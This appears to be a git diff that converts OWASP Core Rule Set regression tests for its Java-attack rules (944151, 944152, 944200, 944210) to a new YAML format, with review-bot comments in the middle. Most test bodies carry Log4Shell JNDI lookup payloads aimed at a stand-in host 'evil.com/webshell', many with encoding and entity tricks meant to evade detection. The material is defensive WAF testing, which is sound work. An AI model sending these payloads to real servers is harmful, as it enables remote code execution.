uri: "/post" + data: '{"foo": "%24%26lbrace%3Bjndi%3Aldap%3A%2F%2Fevil.com%2Fwebshell%7D"}' + version: "HTTP/1.1" + output: + log: + expect_ids: [944151] + - test_id: 19 desc: Log4J exploit on JSON with numeric HTML entity evasion wrapped in URL 
encoding evasion stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/json - method: POST - port: 80 - uri: "/post" - data: '{"foo": "%26%2336%3B%7Bjndi%3Aldap%3A%2F%2Fevil.com%2Fwebshell%7D"}' - version: "HTTP/1.1" - output: - log_contains: id "944151" - - test_title: 944151-20 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/json + method: POST + port: 80 + uri: "/post" + data: '{"foo": "%26%2336%3B%7Bjndi%3Aldap%3A%2F%2Fevil.com%2Fwebshell%7D"}' + version: "HTTP/1.1" + output: + log: + expect_ids: [944151] + - test_id: 20 desc: Log4J exploit on JSON with named HTML entity evasion, wrapped in Unicode escape evasion stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/json - method: POST - port: 80 - uri: "/post" - data: '{"foo": "$\u0026lbrace;jndi:ldap://evil.com/webshell}"}' - version: "HTTP/1.1" - output: - log_contains: id "944151" - - test_title: 944151-21 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/json + method: POST + port: 80 + uri: "/post" + data: '{"foo": "$\u0026lbrace;jndi:ldap://evil.com/webshell}"}' + version: "HTTP/1.1" + output: + log: + expect_ids: [944151] + - test_id: 21 desc: Log4J exploit on JSON with numeric HTML entity evasion, wrapped in Unicode escape evasion stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/json - method: POST - port: 80 - uri: "/post" - data: '{"foo": "$\u0026#123;jndi:ldap://evil.com/webshell}"}' - version: "HTTP/1.1" - output: - log_contains: id "944151" - - test_title: 944151-22 + - input: + 
dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/json + method: POST + port: 80 + uri: "/post" + data: '{"foo": "$\u0026#123;jndi:ldap://evil.com/webshell}"}' + version: "HTTP/1.1" + output: + log: + expect_ids: [944151] + - test_id: 22 desc: Log4J exploit on JSON with named and numeric HTML entity evasion, mixed with unicode escape evasion and URL encoding evasion stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/json - method: POST - port: 80 - uri: "/post" - data: '{"foo": "%24{\u006Andi:ldap://evil.com/webshell}"}' - version: "HTTP/1.1" - output: - log_contains: id "944151" - - test_title: 944151-23 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/json + method: POST + port: 80 + uri: "/post" + data: '{"foo": "%24{\u006Andi:ldap://evil.com/webshell}"}' + version: "HTTP/1.1" + output: + log: + expect_ids: [944151] + - test_id: 23 desc: Log4J exploit on User-Agent header which is known to work against org.apache.commons:commons-text:1.9 stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: '${jndi:ldap://evil.om/w}' - Content-Type: text/html - method: GET - port: 80 - uri: "/get" - version: "HTTP/1.1" - output: - log_contains: id "944151" - - test_title: 944151-24 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: '${jndi:ldap://evil.om/w}' + Content-Type: text/html + method: GET + port: 80 + uri: "/get" + version: "HTTP/1.1" + output: + log: + expect_ids: [944151] + - test_id: 24 desc: Log4J exploit on JSON with named HTML entity evasion, wrapped in Unicode escape evasion, omitting terminal semi-colon stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: 
"*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/json - method: POST - port: 80 - uri: "/post" - data: '{"foo": "$\u0026lbracejndi:ldap://evil.com/webshell}"}' - version: "HTTP/1.1" - output: - log_contains: id "944151" - - test_title: 944151-25 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/json + method: POST + port: 80 + uri: "/post" + data: '{"foo": "$\u0026lbracejndi:ldap://evil.com/webshell}"}' + version: "HTTP/1.1" + output: + log: + expect_ids: [944151] + - test_id: 25 desc: Log4J exploit on arg foo, with evasion stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/x-www-form-urlencoded - method: POST - port: 80 - uri: "/post" - data: foo=$${env:somethingveryverylong:-${env:something:-$}{jndi:ldap://evilhost.com/webshell}}} - version: "HTTP/1.1" - output: - log_contains: id "944151" + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/x-www-form-urlencoded + method: POST + port: 80 + uri: "/post" + data: foo=$${env:somethingveryverylong:-${env:something:-$}{jndi:ldap://evilhost.com/webshell}}} + version: "HTTP/1.1" + output: + log: + expect_ids: [944151] diff --git a/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944152.yaml b/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944152.yaml index e88f83f..f1509f2 100644 --- a/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944152.yaml +++ b/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944152.yaml 
@@ -1,474 +1,472 @@ --- -# NOTE: Please keep these tests in sync with 944152.yaml and 944151.yaml. -# 944152 should detect the same things as 944152 and 944151. +# NOTE: Please keep these tests in sync with 944150.yaml and 944151.yaml. +# 944152 should detect the same things as 944150 and 944151. meta: author: "dune73, Max Leske, azurit" - enabled: true - name: "944152.yaml" - description: "Description" +rule_id: 944152 tests: - - test_title: 944152-1 + - test_id: 1 desc: Log4J exploit on arg foo stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/x-www-form-urlencoded - method: POST - port: 80 - uri: "/post" - data: foo=${jndi:ldap://evil.com/webshell} - version: "HTTP/1.1" - output: - log_contains: id "944152" - - test_title: 944152-2 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/x-www-form-urlencoded + method: POST + port: 80 + uri: "/post" + data: foo=${jndi:ldap://evil.com/webshell} + version: "HTTP/1.1" + output: + log: + expect_ids: [944152] + - test_id: 2 desc: Log4J exploit on User-Agent stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent ${jndi:ldap://evil.com/webshell}" - method: GET - port: 80 - uri: "/get" - version: "HTTP/1.1" - output: - log_contains: id "944152" - - test_title: 944152-3 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent ${jndi:ldap://evil.com/webshell}" + method: GET + port: 80 + uri: "/get" + version: "HTTP/1.1" + output: + log: + expect_ids: [944152] + - test_id: 3 desc: Log4J exploit in XML code stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/xml - method: POST - 
port: 80 - uri: "/post" - data: - version: "HTTP/1.1" - output: - log_contains: id "944152" - - test_title: 944152-4 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/xml + method: POST + port: 80 + uri: "/post" + data: + version: "HTTP/1.1" + output: + log: + expect_ids: [944152] + - test_id: 4 desc: Log4J exploit in XML code stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/xml - method: POST - port: 80 - uri: "/post" - data: "${jndi:ldap://evil.com/webshell}" - version: "HTTP/1.1" - output: - log_contains: id "944152" - - test_title: 944152-5 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/xml + method: POST + port: 80 + uri: "/post" + data: "${jndi:ldap://evil.com/webshell}" + version: "HTTP/1.1" + output: + log: + expect_ids: [944152] + - test_id: 5 desc: Log4J exploit on arg foo, with evasion stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/x-www-form-urlencoded - method: POST - port: 80 - uri: "/post" - data: foo=${${env:FOO:-j}ndi:ldap://evil.com/webshell} - version: "HTTP/1.1" - output: - log_contains: id "944152" - - test_title: 944152-6 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/x-www-form-urlencoded + method: POST + port: 80 + uri: "/post" + data: foo=${${env:FOO:-j}ndi:ldap://evil.com/webshell} + version: "HTTP/1.1" + output: + log: + expect_ids: [944152] + - test_id: 6 desc: Log4J exploit on arg foo, with evasion stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS 
test agent" - Content-Type: application/x-www-form-urlencoded - method: POST - port: 80 - uri: "/post" - data: foo=${${::-j}${::-n}${::-d}${::-i}:ldap://evil.com/webshell} - version: "HTTP/1.1" - output: - log_contains: id "944152" - - test_title: 944152-7 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/x-www-form-urlencoded + method: POST + port: 80 + uri: "/post" + data: foo=${${::-j}${::-n}${::-d}${::-i}:ldap://evil.com/webshell} + version: "HTTP/1.1" + output: + log: + expect_ids: [944152] + - test_id: 7 desc: Log4J exploit on arg foo, with evasion stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/x-www-form-urlencoded - method: POST - port: 80 - uri: "/post" - data: foo=$${env:something:-${env:something:-$}{jndi:ldap://evil.com/webshell}}} - version: "HTTP/1.1" - output: - log_contains: id "944152" - - test_title: 944152-8 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/x-www-form-urlencoded + method: POST + port: 80 + uri: "/post" + data: foo=$${env:something:-${env:something:-$}{jndi:ldap://evil.com/webshell}}} + version: "HTTP/1.1" + output: + log: + expect_ids: [944152] + - test_id: 8 desc: Log4J exploit on arg foo, with Unicode escape encoding evasion stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/x-www-form-urlencoded - method: POST - port: 80 - uri: "/post" - data: foo=$\u007Bjndi:ldap://evil.com/webshell} - version: "HTTP/1.1" - output: - log_contains: id "944152" - - test_title: 944152-9 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: 
application/x-www-form-urlencoded + method: POST + port: 80 + uri: "/post" + data: foo=$\u007Bjndi:ldap://evil.com/webshell} + version: "HTTP/1.1" + output: + log: + expect_ids: [944152] + - test_id: 9 desc: Log4J exploit on JSON with URL encoding evasion stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/json - method: POST - port: 80 - uri: "/post" - data: '{"foo": "%24%7Bjndi%3Aldap%3A%2F%2Fevil.com%2Fwebshell%7D"}' - version: "HTTP/1.1" - output: - log_contains: id "944152" - - test_title: 944152-10 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/json + method: POST + port: 80 + uri: "/post" + data: '{"foo": "%24%7Bjndi%3Aldap%3A%2F%2Fevil.com%2Fwebshell%7D"}' + version: "HTTP/1.1" + output: + log: + expect_ids: [944152] + - test_id: 10 desc: Log4J exploit on JSON with Unicode escape evasion, uppercase stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/json - method: POST - port: 80 - uri: "/post" - data: '{"foo": "$\u007Bjndi:ldap://evil.com/webshell}"}' - version: "HTTP/1.1" - output: - log_contains: id "944152" - - test_title: 944152-11 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/json + method: POST + port: 80 + uri: "/post" + data: '{"foo": "$\u007Bjndi:ldap://evil.com/webshell}"}' + version: "HTTP/1.1" + output: + log: + expect_ids: [944152] + - test_id: 11 desc: Log4J exploit on JSON with Unicode escape evasion, lowercase stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/json - method: POST - port: 80 - uri: "/post" - data: 
'{"foo": "$\u007bjndi:ldap://evil.com/webshell}"}' - version: "HTTP/1.1" - output: - log_contains: id "944152" - - test_title: 944152-12 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/json + method: POST + port: 80 + uri: "/post" + data: '{"foo": "$\u007bjndi:ldap://evil.com/webshell}"}' + version: "HTTP/1.1" + output: + log: + expect_ids: [944152] + - test_id: 12 desc: Log4J exploit on JSON with named HTML entity evasion, lower case stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/json - method: POST - port: 80 - uri: "/post" - data: '{"foo": "${jndi:ldap://evil.com/webshell}"}' - version: "HTTP/1.1" - output: - log_contains: id "944152" - - test_title: 944152-13 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/json + method: POST + port: 80 + uri: "/post" + data: '{"foo": "${jndi:ldap://evil.com/webshell}"}' + version: "HTTP/1.1" + output: + log: + expect_ids: [944152] + - test_id: 13 desc: Log4J exploit on JSON with named HTML entity evasion, upper case stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/json - method: POST - port: 80 - uri: "/post" - data: '{"foo": "$&LBRACE;jndi:ldap://evil.com/webshell}"}' - version: "HTTP/1.1" - output: - log_contains: id "944152" - - test_title: 944152-14 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/json + method: POST + port: 80 + uri: "/post" + data: '{"foo": "$&LBRACE;jndi:ldap://evil.com/webshell}"}' + version: "HTTP/1.1" + output: + log: + expect_ids: [944152] + - test_id: 14 desc: Log4J exploit on JSON 
with numeric HTML entity evasion stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/json - method: POST - port: 80 - uri: "/post" - data: '{"foo": "${jndi:ldap://evil.com/webshell}"}' - version: "HTTP/1.1" - output: - log_contains: id "944152" - - test_title: 944152-15 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/json + method: POST + port: 80 + uri: "/post" + data: '{"foo": "${jndi:ldap://evil.com/webshell}"}' + version: "HTTP/1.1" + output: + log: + expect_ids: [944152] + - test_id: 15 desc: Log4J exploit on JSON with Unicode escape evasion, wrapped in URL encoding evasion stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/json - method: POST - port: 80 - uri: "/post" - data: '{"foo": "%24%5Cu007Bjndi%3Aldap%3A%2F%2Fevil.com%2Fwebshell%7D"}' - version: "HTTP/1.1" - output: - log_contains: id "944152" - - test_title: 944152-16 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/json + method: POST + port: 80 + uri: "/post" + data: '{"foo": "%24%5Cu007Bjndi%3Aldap%3A%2F%2Fevil.com%2Fwebshell%7D"}' + version: "HTTP/1.1" + output: + log: + expect_ids: [944152] + - test_id: 16 desc: Log4J exploit on JSON with URL encoding evasion, wrapped in Unicode escape evasion stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/json - method: POST - port: 80 - uri: "/post" - data: '{"foo": "\u002524%7Bjndi%3Aldap%3A%2F%2Fevil.com%2Fwebshell%7D"}' - version: "HTTP/1.1" - output: - log_contains: id "944152" - - test_title: 944152-17 + - input: + dest_addr: 
"127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/json + method: POST + port: 80 + uri: "/post" + data: '{"foo": "\u002524%7Bjndi%3Aldap%3A%2F%2Fevil.com%2Fwebshell%7D"}' + version: "HTTP/1.1" + output: + log: + expect_ids: [944152] + - test_id: 17 desc: Log4J exploit on JSON with URL encoding evasion, mixed with Unicode escape evasion stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/json - method: POST - port: 80 - uri: "/post" - data: '{"foo": "%24\u007Bjndi%3Aldap%3A%2F%2Fevil.com%2Fwebshell%7D"}' - version: "HTTP/1.1" - output: - log_contains: id "944152" - - test_title: 944152-18 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/json + method: POST + port: 80 + uri: "/post" + data: '{"foo": "%24\u007Bjndi%3Aldap%3A%2F%2Fevil.com%2Fwebshell%7D"}' + version: "HTTP/1.1" + output: + log: + expect_ids: [944152] + - test_id: 18 desc: Log4J exploit on JSON with named HTML entity evasion wrapped in URL encoding evasion stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/json - method: POST - port: 80 - uri: "/post" - data: '{"foo": "%24%26lbrace%3Bjndi%3Aldap%3A%2F%2Fevil.com%2Fwebshell%7D"}' - version: "HTTP/1.1" - output: - log_contains: id "944152" - - test_title: 944152-19 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/json + method: POST + port: 80 + uri: "/post" + data: '{"foo": "%24%26lbrace%3Bjndi%3Aldap%3A%2F%2Fevil.com%2Fwebshell%7D"}' + version: "HTTP/1.1" + output: + log: + expect_ids: [944152] + - test_id: 19 desc: Log4J exploit on JSON with numeric HTML entity evasion 
wrapped in URL encoding evasion stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/json - method: POST - port: 80 - uri: "/post" - data: '{"foo": "%26%2336%3B%7Bjndi%3Aldap%3A%2F%2Fevil.com%2Fwebshell%7D"}' - version: "HTTP/1.1" - output: - log_contains: id "944152" - - test_title: 944152-20 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/json + method: POST + port: 80 + uri: "/post" + data: '{"foo": "%26%2336%3B%7Bjndi%3Aldap%3A%2F%2Fevil.com%2Fwebshell%7D"}' + version: "HTTP/1.1" + output: + log: + expect_ids: [944152] + - test_id: 20 desc: Log4J exploit on JSON with named HTML entity evasion, wrapped in Unicode escape evasion stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/json - method: POST - port: 80 - uri: "/post" - data: '{"foo": "$\u0026lbrace;jndi:ldap://evil.com/webshell}"}' - version: "HTTP/1.1" - output: - log_contains: id "944152" - - test_title: 944152-21 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/json + method: POST + port: 80 + uri: "/post" + data: '{"foo": "$\u0026lbrace;jndi:ldap://evil.com/webshell}"}' + version: "HTTP/1.1" + output: + log: + expect_ids: [944152] + - test_id: 21 desc: Log4J exploit on JSON with numeric HTML entity evasion, wrapped in Unicode escape evasion stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/json - method: POST - port: 80 - uri: "/post" - data: '{"foo": "$\u0026#123;jndi:ldap://evil.com/webshell}"}' - version: "HTTP/1.1" - output: - log_contains: id "944152" - - test_title: 944152-22 
+ - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/json + method: POST + port: 80 + uri: "/post" + data: '{"foo": "$\u0026#123;jndi:ldap://evil.com/webshell}"}' + version: "HTTP/1.1" + output: + log: + expect_ids: [944152] + - test_id: 22 desc: Log4J exploit on JSON with named and numeric HTML entity evasion, mixed with unicode escape evasion and URL encoding evasion stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/json - method: POST - port: 80 - uri: "/post" - data: '{"foo": "%24{\u006Andi:ldap://evil.com/webshell}"}' - version: "HTTP/1.1" - output: - log_contains: id "944152" - - test_title: 944152-23 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/json + method: POST + port: 80 + uri: "/post" + data: '{"foo": "%24{\u006Andi:ldap://evil.com/webshell}"}' + version: "HTTP/1.1" + output: + log: + expect_ids: [944152] + - test_id: 23 desc: Log4J exploit on User-Agent header which is known to work against org.apache.commons:commons-text:1.9 stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: '${jndi:ldap://evil.om/w}' - Content-Type: text/html - method: GET - port: 80 - uri: "/get" - version: "HTTP/1.1" - output: - log_contains: id "944152" - - test_title: 944152-24 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: '${jndi:ldap://evil.om/w}' + Content-Type: text/html + method: GET + port: 80 + uri: "/get" + version: "HTTP/1.1" + output: + log: + expect_ids: [944152] + - test_id: 24 desc: Log4J exploit on JSON with named HTML entity evasion, wrapped in Unicode escape evasion, omitting terminal semi-colon stages: - - stage: - input: - dest_addr: "127.0.0.1" - 
headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/json - method: POST - port: 80 - uri: "/post" - data: '{"foo": "$\u0026lbracejndi:ldap://evil.com/webshell}"}' - version: "HTTP/1.1" - output: - log_contains: id "944152" - - test_title: 944152-25 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/json + method: POST + port: 80 + uri: "/post" + data: '{"foo": "$\u0026lbracejndi:ldap://evil.com/webshell}"}' + version: "HTTP/1.1" + output: + log: + expect_ids: [944152] + - test_id: 25 desc: Log4J exploit on arg foo, with evasion stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/x-www-form-urlencoded - method: POST - port: 80 - uri: "/post" - data: foo=$${env:somethingveryverylong:-${env:something:-$}{jndi:ldap://evilhost.com/webshell}}} - version: "HTTP/1.1" - output: - log_contains: id "944152" - - test_title: 944152-26 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/x-www-form-urlencoded + method: POST + port: 80 + uri: "/post" + data: foo=$${env:somethingveryverylong:-${env:something:-$}{jndi:ldap://evilhost.com/webshell}}} + version: "HTTP/1.1" + output: + log: + expect_ids: [944152] + - test_id: 26 desc: Log4J exploit on arg foo, with evasion stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/x-www-form-urlencoded - method: POST - port: 80 - uri: "/post" - data: '{"foo": "$\u0026lbracesomethingnotcoveredbyotherrules"}' - version: "HTTP/1.1" - output: - log_contains: id "944152" + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + 
Content-Type: application/x-www-form-urlencoded + method: POST + port: 80 + uri: "/post" + data: '{"foo": "$\u0026lbracesomethingnotcoveredbyotherrules"}' + version: "HTTP/1.1" + output: + log: + expect_ids: [944152] diff --git a/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944200.yaml b/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944200.yaml index 288c536..8016cdc 100644 --- a/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944200.yaml +++ b/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944200.yaml @@ -1,17 +1,15 @@ --- meta: author: "spartantri" - enabled: true - name: "944200.yaml" - description: "Description" +rule_id: 944200 tests: - - test_title: 944200-1 + - test_id: 1 desc: Argument test includes java serialization magic bytes, base64 encoded request stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - encoded_request: "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" - output: - log_contains: "id \"944200\"" + - input: + dest_addr: "127.0.0.1" + port: 80 + encoded_request: "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" + output: + log: + expect_ids: [944200] diff --git a/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944210.yaml b/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944210.yaml index da10d5c..8aa8889 100644 --- a/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944210.yaml +++ b/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944210.yaml 
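Review bot: Test 26's `desc: Log4J exploit on arg foo, with evasion` is copied from test 25, but its body is a JSON-shaped string sent as `application/x-www-form-urlencoded` and contains no `jndi` token — the placeholder `somethingnotcoveredbyotherrules` suggests it exists to show that 944152 alone fires on the entity-encoded `${` prefix, which the description does not say. A description such as `desc: Entity-encoded '${' prefix without jndi, sent as a form body; expected to be caught by 944152 only` would make the intent reviewable, and since 944151 stops at test 25 it is worth stating in the NOTE header that this extra case is intentionally not mirrored there. Separately, test 3's `data:` appears empty in this view while test 4 carries the XML payload; if the body really is empty the expectation `expect_ids: [944152]` cannot be met, so please confirm the file content (this may be a rendering artefact of the page).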
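Review bot: The `encoded_request` value in test 1 is an opaque blob, so neither the location of the serialization magic bytes nor the headers being sent can be reviewed from the YAML, and `desc` only says "base64 encoded request". A one-line comment above `encoded_request:` stating what the decoded request carries (which argument or header holds the magic bytes, and how the blob was produced) would let maintainers regenerate it when the test format changes again; the decoded request is not visible in this view, so I cannot confirm what it contains.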
@@ -1,1108 +1,1106 @@ --- meta: author: "spartantri, azurit" - enabled: true - name: "944210.yaml" - description: "Positive tests for rule 944210" +rule_id: 944210 tests: - - test_title: 944210-1 + - test_id: 1 desc: "Argument test includes keyword rO0ABQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=rO0ABQ" - output: - log_contains: "id \"944210\"" - - test_title: 944210-2 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=rO0ABQ" + output: + log: + expect_ids: [944210] + - test_id: 2 desc: "Argument name includes keyword rO0ABQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "rO0ABQ=test" - output: - log_contains: "id \"944210\"" - - test_title: 944210-3 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: 
